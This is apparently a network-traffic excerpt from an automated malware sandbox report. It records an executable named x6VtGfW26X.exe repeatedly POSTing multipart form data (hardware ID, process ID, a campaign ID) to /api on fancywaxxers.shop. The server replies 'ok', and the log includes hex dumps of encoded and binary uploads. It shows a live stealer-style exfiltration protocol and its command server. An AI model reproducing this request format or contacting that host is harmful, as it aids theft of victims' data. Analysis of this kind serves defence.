                                                                                      2024-12-31 08:43:04 UTC1369INData Raw: 62 6d 4c 77 35 37 59 67 55 61 6b 30 39 76 48 6c 61 73 33 44 62 44 38 75 74 4f 79 4a 5a 67 65 69 6b 49 38 2b 68 78 47 44 6d 75 75 38 6f 48 48 7a 49 37 46 52 71 54 63 30 38 66 61 34 6e 59 4b 75 72 50 69 6b 4f 6b 66 6e 77 57 55 57 44 37 6b 45 41 45 5a 4c 4c 43 39 67 63 4f 4b 32 59 59 4f 35 70 4c 52 33 4a 57 39 4e 79 71 34 76 2b 47 48 37 41 62 62 45 4e 56 4f 63 65 30 57 52 6b 6c 6c 73 62 79 48 78 6f 7a 45 6a 55 57 6a 31 38 54 50 33 4f 68 36 43 71 57 32 37 5a 44 68 45 4a 45 46 6c 46 30 31 35 78 63 41 45 53 58 33 2f 4d 62 4d 6c 4a 62 64 44 6f 76 58 78 73 50 5a 38 7a 55 77 36 4b 4f 73 69 71 45 51 6c 30 2f 44 46 7a 6e 76 47 51 55 61 4b 72 53 36 6a 64 6d 4d 78 49 4e 44 72 63 44 51 77 64 76 76 64 42 69 69 73 75 53 51 36 42 79 53 43 70 78 54 63 61 52 61 41 51 6c 6c
                                                                                      Data Ascii: bmLw57YgUak09vHlas3DbD8utOyJZgeikI8+hxGDmuu8oHHzI7FRqTc08fa4nYKurPikOkfnwWUWD7kEAEZLLC9gcOK2YYO5pLR3JW9Nyq4v+GH7AbbENVOce0WRkllsbyHxozEjUWj18TP3Oh6CqW27ZDhEJEFlF015xcAESX3/MbMlJbdDovXxsPZ8zUw6KOsiqEQl0/DFznvGQUaKrS6jdmMxINDrcDQwdvvdBiisuSQ6BySCpxTcaRaAQll
                                                                                      2024-12-31 08:43:04 UTC1369INData Raw: 4f 44 33 34 52 4e 72 4e 50 63 31 73 66 6c 65 78 69 6b 74 75 53 63 37 42 76 62 51 64 74 51 4b 61 70 43 52 6a 73 6d 6f 37 47 4d 69 62 6e 56 69 30 43 76 78 4a 62 62 6d 2f 77 33 44 61 54 38 75 74 50 73 46 70 4d 4a 69 56 67 38 36 52 51 49 48 69 43 34 75 6f 62 4c 67 64 4f 42 52 61 50 52 32 38 44 48 37 33 63 43 72 62 33 6f 6d 61 46 5a 32 77 69 44 46 32 6d 71 4b 78 45 61 5a 34 4b 78 69 4d 57 4c 77 4d 56 52 35 73 75 57 77 39 6d 6c 4c 30 71 6c 74 4f 65 57 37 68 61 52 41 5a 35 64 50 65 49 55 42 51 4d 71 73 37 4b 4b 77 34 62 62 69 30 71 67 32 39 33 50 30 2b 56 32 41 4f 6a 79 6f 70 54 35 56 38 4e 50 72 31 41 39 35 78 56 45 4a 43 61 35 76 49 48 64 7a 4d 6e 4c 56 2b 6a 56 32 6f 53 4e 70 58 73 44 71 4c 66 6f 6c 2b 45 51 6c 67 71 59 55 44 4c 6e 48 51 77 66 49 72 4f 2b 6a
                                                                                      Data Ascii: OD34RNrNPc1sflexiktuSc7BvbQdtQKapCRjsmo7GMibnVi0CvxJbbm/w3DaT8utPsFpMJiVg86RQIHiC4uobLgdOBRaPR28DH73cCrb3omaFZ2wiDF2mqKxEaZ4KxiMWLwMVR5suWw9mlL0qltOeW7haRAZ5dPeIUBQMqs7KKw4bbi0qg293P0+V2AOjyopT5V8NPr1A95xVEJCa5vIHdzMnLV+jV2oSNpXsDqLfol+EQlgqYUDLnHQwfIrO+j
                                                                                      2024-12-31 08:43:04 UTC1369INData Raw: 46 41 4f 6a 56 7a 6f 53 4e 70 58 77 2f 70 71 71 69 6a 4b 38 4f 32 77 69 58 46 32 6d 71 45 77 38 44 4b 37 6d 37 69 38 32 45 30 59 74 44 6f 39 54 64 77 39 4c 6a 65 67 4b 6c 75 65 47 53 35 52 32 4a 44 4a 42 64 50 4f 42 61 53 46 45 69 72 2f 4c 65 69 36 76 61 72 46 36 7a 77 4d 43 45 79 71 74 75 53 71 2b 77 6f 73 75 68 46 4a 51 47 6c 46 38 35 35 52 55 43 48 79 4f 78 76 34 50 45 68 73 53 4e 51 4b 58 5a 32 63 2f 48 35 58 6f 4f 70 4c 6a 71 6d 4f 74 58 31 55 2b 63 54 33 47 79 57 6a 4d 63 4b 72 65 78 6b 49 75 54 6d 4a 77 4f 72 39 36 57 6e 4a 58 70 65 51 71 6e 73 4f 36 59 36 52 61 58 41 5a 78 53 4f 4f 49 53 46 42 41 68 76 37 4f 49 78 49 33 53 67 45 75 73 31 64 4c 43 32 71 55 35 53 71 2b 6b 6f 73 75 68 4f 4c 77 36 32 58 59 4c 71 67 56 49 43 47 57 77 76 73 61 54 7a 4e
                                                                                      Data Ascii: FAOjVzoSNpXw/pqqijK8O2wiXF2mqEw8DK7m7i82E0YtDo9Tdw9LjegKlueGS5R2JDJBdPOBaSFEir/Lei6varF6zwMCEyqtuSq+wosuhFJQGlF855RUCHyOxv4PEhsSNQKXZ2c/H5XoOpLjqmOtX1U+cT3GyWjMcKrexkIuTmJwOr96WnJXpeQqnsO6Y6RaXAZxSOOISFBAhv7OIxI3SgEus1dLC2qU5Sq+kosuhOLw62XYLqgVICGWwvsaTzN
                                                                                      2024-12-31 08:43:04 UTC1369INData Raw: 6e 4d 2b 45 30 75 6b 33 55 75 69 32 36 5a 66 69 45 35 34 41 6d 6c 59 33 2b 42 30 50 41 79 75 36 76 59 37 44 68 64 65 42 53 36 58 55 32 73 37 55 34 6e 6b 45 6f 50 79 73 30 2b 59 50 32 31 66 62 64 69 48 78 43 42 41 63 42 4c 71 39 78 74 54 43 7a 38 56 4a 70 4a 4b 4f 68 4e 7a 33 63 77 65 36 74 65 57 64 37 68 53 4a 44 70 5a 63 49 2b 30 56 41 68 59 70 73 62 32 41 79 6f 6e 63 69 55 6d 74 32 64 6e 49 6c 61 73 33 44 62 44 38 75 74 50 50 48 49 67 59 6d 46 6b 36 2f 41 46 47 44 6d 75 75 38 6f 48 48 7a 49 37 46 54 61 50 5a 30 73 54 5a 35 58 4d 48 71 4b 37 74 6c 4f 59 65 6b 42 32 52 55 44 62 68 45 67 30 65 49 36 57 2b 69 4e 6d 4a 78 4a 63 4f 35 70 4c 52 33 4a 57 39 4e 7a 79 76 72 50 4b 51 6f 79 61 4e 44 49 31 63 50 4f 5a 61 47 56 38 38 39 37 57 4b 69 39 53 57 67 30 47
                                                                                      Data Ascii: nM+E0uk3Uui26ZfiE54AmlY3+B0PAyu6vY7DhdeBS6XU2s7U4nkEoPys0+YP21fbdiHxCBAcBLq9xtTCz8VJpJKOhNz3cwe6teWd7hSJDpZcI+0VAhYpsb2AyonciUmt2dnIlas3DbD8utPPHIgYmFk6/AFGDmuu8oHHzI7FTaPZ0sTZ5XMHqK7tlOYekB2RUDbhEg0eI6W+iNmJxJcO5pLR3JW9NzyvrPKQoyaNDI1cPOZaGV8897WKi9SWg0G
                                                                                      2024-12-31 08:43:04 UTC1369INData Raw: 70 57 72 4e 77 32 77 2f 4c 72 54 32 52 79 56 50 5a 68 4d 63 66 56 55 48 31 45 69 75 2f 4c 65 69 34 2f 52 68 6b 2b 69 32 39 72 4c 30 75 46 6c 41 4b 2b 75 34 35 4c 71 47 70 63 50 6c 6c 6f 37 36 78 4d 4c 48 53 69 77 74 59 6e 4f 7a 4a 6a 46 53 62 43 53 6a 6f 54 30 36 48 77 47 38 2b 61 69 6a 4b 38 4f 32 77 69 58 46 32 6d 71 47 67 77 55 4c 37 71 78 69 63 69 65 31 34 4e 63 71 4e 2f 63 31 74 2f 75 63 67 65 6c 73 65 47 56 35 78 79 58 48 5a 4a 58 4d 75 46 61 53 46 45 69 72 2f 4c 65 69 36 2f 42 6b 30 53 76 33 73 44 50 31 4f 5a 68 42 37 6a 38 72 4e 50 77 45 49 70 50 77 30 45 68 2f 52 30 5a 58 7a 7a 33 74 59 71 4c 31 4a 61 44 52 36 37 56 30 4d 72 48 34 48 45 46 70 37 58 72 6c 2b 6b 55 6d 77 75 66 55 44 54 70 46 67 30 57 4a 72 69 32 6a 38 57 46 32 63 55 41 36 4e 58 4f
                                                                                      Data Ascii: pWrNw2w/LrT2RyVPZhMcfVUH1Eiu/Lei4/Rhk+i29rL0uFlAK+u45LqGpcPllo76xMLHSiwtYnOzJjFSbCSjoT06HwG8+aijK8O2wiXF2mqGgwUL7qxicie14NcqN/c1t/ucgelseGV5xyXHZJXMuFaSFEir/Lei6/Bk0Sv3sDP1OZhB7j8rNPwEIpPw0Eh/R0ZXzz3tYqL1JaDR67V0MrH4HEFp7Xrl+kUmwufUDTpFg0WJri2j8WF2cUA6NXO
                                                                                      2024-12-31 08:43:04 UTC275INData Raw: 4d 4f 70 72 76 73 6e 75 41 46 6d 41 62 62 47 58 48 74 41 6b 5a 4a 5a 5a 65 35 6b 4d 36 4c 77 4d 64 37 71 39 7a 59 77 38 4f 6c 61 44 58 6d 2f 4f 32 4a 6f 55 2b 69 46 74 74 51 50 61 70 43 52 67 51 69 74 37 57 63 33 59 76 61 6c 45 57 6c 33 76 54 4c 30 76 4e 30 42 61 75 74 36 39 2f 71 47 74 74 42 32 31 41 70 71 6b 4a 47 50 69 4b 68 73 61 6e 49 6e 64 2f 46 41 4f 6a 56 77 49 53 4e 70 55 6c 4b 75 72 2f 79 6b 4f 34 47 70 55 2f 44 54 67 2b 71 45 52 41 57 4e 62 53 6b 6a 63 61 41 78 37 73 4f 38 49 61 45 6c 6f 65 33 4a 52 58 6f 6f 39 33 64 6f 52 62 62 56 36 4a 4f 63 66 78 61 58 6b 4e 72 39 36 44 47 6b 38 79 52 68 6c 79 36 31 4e 58 53 31 71 4a 4a 4e 49 2b 71 36 4a 54 78 45 49 77 41 32 78 6c 78 35 56 70 65 4b 47 57 2b 74 5a 33 61 6d 74 75 56 53 65 6a 74 6d 49 54 4e 70
                                                                                      Data Ascii: MOprvsnuAFmAbbGXHtAkZJZZe5kM6LwMd7q9zYw8OlaDXm/O2JoU+iFttQPapCRgQit7Wc3YvalEWl3vTL0vN0Baut69/qGttB21ApqkJGPiKhsanInd/FAOjVwISNpUlKur/ykO4GpU/DTg+qERAWNbSkjcaAx7sO8IaEloe3JRXoo93doRbbV6JOcfxaXkNr96DGk8yRhly61NXS1qJJNI+q6JTxEIwA2xlx5VpeKGW+tZ3amtuVSejtmITNp
                                                                                      2024-12-31 08:43:04 UTC1369INData Raw: 32 63 65 64 0d 0a 74 43 67 45 47 4b 76 66 38 78 73 33 4d 6a 74 59 41 36 4e 62 48 68 49 32 31 4a 56 48 39 37 37 58 44 73 77 6a 56 46 74 74 42 63 62 4a 49 53 46 45 33 39 2b 72 47 6a 49 2f 45 6c 30 69 72 78 4e 57 44 36 39 74 51 45 4b 57 36 39 59 4c 66 4b 5a 77 56 6c 6c 45 6d 2b 31 59 54 45 69 75 35 74 5a 43 4c 77 70 61 4b 44 76 44 72 6c 6f 79 56 32 6a 6c 4b 73 50 79 36 30 39 51 55 6c 51 47 63 51 53 43 6e 50 52 77 63 49 36 43 6a 78 6f 58 4d 30 4d 55 57 2b 70 79 57 77 4d 53 6c 4c 31 72 36 35 37 66 41 74 6b 66 4a 45 4e 56 4f 63 66 78 61 58 6b 4e 72 39 36 44 47 6b 38 79 52 68 6c 79 36 31 4e 58 53 31 71 4a 4a 4e 49 61 37 35 4a 62 6d 42 39 6b 68 6b 45 4d 32 71 6c 52 47 48 6d 58 76 69 38 61 44 7a 4f 6e 4c 44 72 43 53 6a 6f 54 67 35 6e 6b 45 72 36 72 7a 33 73 38 51
                                                                                      Data Ascii: 2cedtCgEGKvf8xs3MjtYA6NbHhI21JVH977XDswjVFttBcbJISFE39+rGjI/El0irxNWD69tQEKW69YLfKZwVllEm+1YTEiu5tZCLwpaKDvDrloyV2jlKsPy609QUlQGcQSCnPRwcI6CjxoXM0MUW+pyWwMSlL1r657fAtkfJENVOcfxaXkNr96DGk8yRhly61NXS1qJJNIa75JbmB9khkEM2qlRGHmXvi8aDzOnLDrCSjoTg5nkEr6rz3s8Q
                                                                                      2024-12-31 08:43:04 UTC1369INData Raw: 56 2f 71 67 68 47 53 57 58 77 73 5a 54 5a 69 74 57 54 54 65 2f 73 36 4f 50 62 34 6e 59 63 75 4b 76 74 72 64 38 43 6d 41 47 56 55 43 66 37 57 6b 68 52 4b 76 66 71 76 34 76 45 6c 72 6f 41 36 4d 71 57 6e 4a 58 51 64 41 53 6d 75 2f 53 43 72 44 43 56 43 4a 70 42 49 66 30 56 52 6c 39 6c 73 66 4c 65 6d 63 4b 57 67 56 2f 6f 69 6f 61 57 6a 72 41 6b 58 66 6a 75 2f 64 33 34 56 34 31 50 77 77 56 2f 71 67 68 47 53 57 58 77 73 5a 54 5a 69 74 57 54 54 65 2f 73 36 4f 50 62 34 6e 59 63 75 4b 76 74 33 4d 38 68 75 6a 47 6c 51 6a 4c 6b 46 41 45 48 4e 50 66 38 78 73 54 4d 6a 72 77 4f 34 4a 4c 70 69 70 58 39 4e 31 4c 6f 69 65 47 64 37 78 43 4e 48 74 5a 77 50 2b 30 62 45 41 45 79 75 50 32 6f 2f 61 32 57 79 77 36 75 6b 6f 36 57 6d 36 56 7a 47 2b 6a 6b 73 73 47 36 51 73 68 59 79
                                                                                      Data Ascii: V/qghGSWXwsZTZitWTTe/s6OPb4nYcuKvtrd8CmAGVUCf7WkhRKvfqv4vElroA6MqWnJXQdASmu/SCrDCVCJpBIf0VRl9lsfLemcKWgV/oioaWjrAkXfju/d34V41PwwV/qghGSWXwsZTZitWTTe/s6OPb4nYcuKvt3M8hujGlQjLkFAEHNPf8xsTMjrwO4JLpipX9N1LoieGd7xCNHtZwP+0bEAEyuP2o/a2Wyw6uko6Wm6VzG+jkssG6QshYy


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.449732104.21.112.14436940C:\Users\user\Desktop\x6VtGfW26X.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-31 08:43:04 UTC284OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=HCZVVRB9YU1BI9MGOFD
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 18169
                                                                                      Host: fancywaxxers.shop
                                                                                      2024-12-31 08:43:04 UTC15331OUTData Raw: 2d 2d 48 43 5a 56 56 52 42 39 59 55 31 42 49 39 4d 47 4f 46 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 38 43 35 38 32 37 39 43 41 45 31 37 35 35 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 48 43 5a 56 56 52 42 39 59 55 31 42 49 39 4d 47 4f 46 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 43 5a 56 56 52 42 39 59 55 31 42 49 39 4d 47 4f 46 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                      Data Ascii: --HCZVVRB9YU1BI9MGOFDContent-Disposition: form-data; name="hwid"0E8C58279CAE175520A4C476FD51BCB1--HCZVVRB9YU1BI9MGOFDContent-Disposition: form-data; name="pid"2--HCZVVRB9YU1BI9MGOFDContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                      2024-12-31 08:43:04 UTC2838OUTData Raw: 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62
                                                                                      Data Ascii: ,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pyb
                                                                                      2024-12-31 08:43:05 UTC1132INHTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:05 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=eepkondoass7tr5ds05tf19q40; expires=Sat, 26 Apr 2025 02:29:44 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DA4F%2FrzShcQ1CT5DoYosJ7mmj7Kvetk8r%2FUo1tlYLMTW9ZCoSU7mfHeMd50Gj5eJLjZ1tarzn6cppqvPWGiwCz2SH5PxDgjYn6DE7UhCYPsip6uLTW1XH7A4DjR5QOc9VvU%2F6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8fadb8cf3c34f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1453&rtt_var=569&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19133&delivery_rate=1883870&cwnd=181&unsent_bytes=0&cid=8205377a64c703ae&ts=686&x=0"
                                                                                      2024-12-31 08:43:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-31 08:43:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.449733104.21.112.14436940C:\Users\user\Desktop\x6VtGfW26X.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-31 08:43:06 UTC283OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=T5H7PAQG41KHN8MHY7C
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8790
                                                                                      Host: fancywaxxers.shop
                                                                                      2024-12-31 08:43:06 UTC8790OUTData Raw: 2d 2d 54 35 48 37 50 41 51 47 34 31 4b 48 4e 38 4d 48 59 37 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 38 43 35 38 32 37 39 43 41 45 31 37 35 35 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 54 35 48 37 50 41 51 47 34 31 4b 48 4e 38 4d 48 59 37 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 35 48 37 50 41 51 47 34 31 4b 48 4e 38 4d 48 59 37 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                      Data Ascii: --T5H7PAQG41KHN8MHY7CContent-Disposition: form-data; name="hwid"0E8C58279CAE175520A4C476FD51BCB1--T5H7PAQG41KHN8MHY7CContent-Disposition: form-data; name="pid"2--T5H7PAQG41KHN8MHY7CContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                      2024-12-31 08:43:06 UTC1131INHTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:06 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=pbs9ggrfar1ufgp8oabqa6j33v; expires=Sat, 26 Apr 2025 02:29:45 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNFpsVUXzLyRO508CO7MX7aEkICtT%2BaixcylrAKFba9b%2FcQSYzL8rUcReBairgGamP2R5iBcK6ZJzupAiZV1zldEJJtygQpAiG2vHrbymb5uNI2zq481fLpqzPVm6TI1vv%2BYog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8fae34db443b3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1571&rtt_var=612&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9731&delivery_rate=1753753&cwnd=203&unsent_bytes=0&cid=5173935186ec6486&ts=751&x=0"
                                                                                      2024-12-31 08:43:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-31 08:43:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.449734104.21.112.14436940C:\Users\user\Desktop\x6VtGfW26X.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-31 08:43:07 UTC276OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=7ZJUYBBS9X5
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 20395
                                                                                      Host: fancywaxxers.shop
                                                                                      2024-12-31 08:43:07 UTC15331OUTData Raw: 2d 2d 37 5a 4a 55 59 42 42 53 39 58 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 38 43 35 38 32 37 39 43 41 45 31 37 35 35 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 37 5a 4a 55 59 42 42 53 39 58 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 5a 4a 55 59 42 42 53 39 58 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 37 5a 4a 55 59 42 42 53 39 58 35 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: --7ZJUYBBS9X5Content-Disposition: form-data; name="hwid"0E8C58279CAE175520A4C476FD51BCB1--7ZJUYBBS9X5Content-Disposition: form-data; name="pid"3--7ZJUYBBS9X5Content-Disposition: form-data; name="lid"PsFKDg--pablo--7ZJUYBBS9X5Cont
                                                                                      2024-12-31 08:43:07 UTC5064OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb
                                                                                      Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                                      2024-12-31 08:43:08 UTC1139INHTTP/1.1 200 OK
                                                                                      Date: Tue, 31 Dec 2024 08:43:08 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=puelpvtkkp8u44b04cf73ufbh9; expires=Sat, 26 Apr 2025 02:29:46 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gt7dlyX30YR7k5GTGf%2FYW5DaW5a2LAVrB9xNfw0CSnjEEWh3gYPJ659FdJ9%2F11S3NwUPVcVoLD8h7MnF3Lh29JieEHl6%2Fg%2BxJcbdXvt%2FYaNApXcxFGw%2BwgYpWmL3CxkG1IOOUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8fa8faecdd1243b3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1537&rtt_var=610&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21351&delivery_rate=1744324&cwnd=203&unsent_bytes=0&cid=262e69ca552bbc89&ts=621&x=0"
                                                                                      2024-12-31 08:43:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2024-12-31 08:43:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.449735104.21.112.14436940C:\Users\user\Desktop\x6VtGfW26X.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-31 08:43:09 UTC282OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=6OPMM33SI10YDMKDTM
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 1248
